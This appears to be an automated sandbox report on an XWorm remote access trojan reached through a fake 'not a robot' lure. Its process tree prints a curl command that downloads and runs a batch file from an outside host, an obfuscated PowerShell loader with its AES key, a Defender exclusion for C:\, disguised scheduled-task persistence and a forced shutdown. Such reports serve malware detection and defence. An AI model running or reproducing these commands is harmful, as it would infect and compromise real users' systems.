Analysis

  • max time kernel
    64s
  • max time network
    66s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags
    arch:x64, arch:x86, image:win10ltsc2021-20250217-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    01/03/2025, 22:32

Errors

Reason
Machine shutdown

General

  • Target

    http://klck.tube

Malware Config

Extracted

Family

xworm

Version

5.0

C2

45.43.2.16:7232

Mutex

jG2dh7zTLhyaOqCH

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 9 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • cURL User-Agent 1 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://klck.tube
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffa9b2dcc40,0x7ffa9b2dcc4c,0x7ffa9b2dcc58
      2⤵
        PID:4748
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1824 /prefetch:2
        2⤵
          PID:2100
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2156 /prefetch:3
          2⤵
            PID:3392
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2436 /prefetch:8
            2⤵
              PID:3336
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3040,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3068 /prefetch:1
              2⤵
                PID:4464
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3132 /prefetch:1
                2⤵
                  PID:1156
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3028,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3656 /prefetch:1
                  2⤵
                    PID:3592
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3368,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3356 /prefetch:8
                    2⤵
                      PID:4588
                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                    1⤵
                      PID:1996
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                      1⤵
                        PID:4184
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c curl.exe -k -Ss "https://sapyapp.org/mait.bat" -o "C:\Users\Admin\mait.bat" && start "" "C:\Users\Admin\mait.bat" By pressing OK you confirm you are not a robot. By pressing OK you confirm you are not a robot
                        1⤵
                          PID:1240
                          • C:\Windows\system32\curl.exe
                            curl.exe -k -Ss "https://sapyapp.org/mait.bat" -o "C:\Users\Admin\mait.bat"
                            2⤵
                              PID:3916
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /K "C:\Users\Admin\mait.bat" By pressing OK you confirm you are not a robot. By pressing OK you confirm you are not a robot
                              2⤵
                                PID:4092
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\mait.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('K0BTCplNEu4xWCs9ShbHa0yURls1psj7JSolVBLuLeA='); $aes_var.IV=[System.Convert]::FromBase64String('RPyhP/lrLEy4oKyAVdA4ng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('By pressing OK you confirm you are not a robot. By pressing OK you confirm you are not a robot'));
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Modifies registry class
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4644
                                  • C:\Windows\system32\reagentc.exe
                                    "reagentc.exe" /disable
                                    4⤵
                                    • Drops file in System32 directory
                                    • Drops file in Windows directory
                                    PID:4052
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1860
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:896
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.vbs"
                                    4⤵
                                    • Checks computer location settings
                                    PID:5344
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.bat" "
                                      5⤵
                                        PID:5408
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('K0BTCplNEu4xWCs9ShbHa0yURls1psj7JSolVBLuLeA='); $aes_var.IV=[System.Convert]::FromBase64String('RPyhP/lrLEy4oKyAVdA4ng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                          6⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5456
                                          • C:\Windows\system32\reagentc.exe
                                            "reagentc.exe" /disable
                                            7⤵
                                            • Drops file in Windows directory
                                            PID:5568
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                            7⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5728
                                          • C:\Windows\system32\shutdown.exe
                                            shutdown.exe /f /s /t 0
                                            7⤵
                                              PID:5152
                                • C:\Windows\system32\LogonUI.exe
                                  "LogonUI.exe" /flags:0x4 /state0:0xa39ca855 /state1:0x41c64e6d
                                  1⤵
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5292
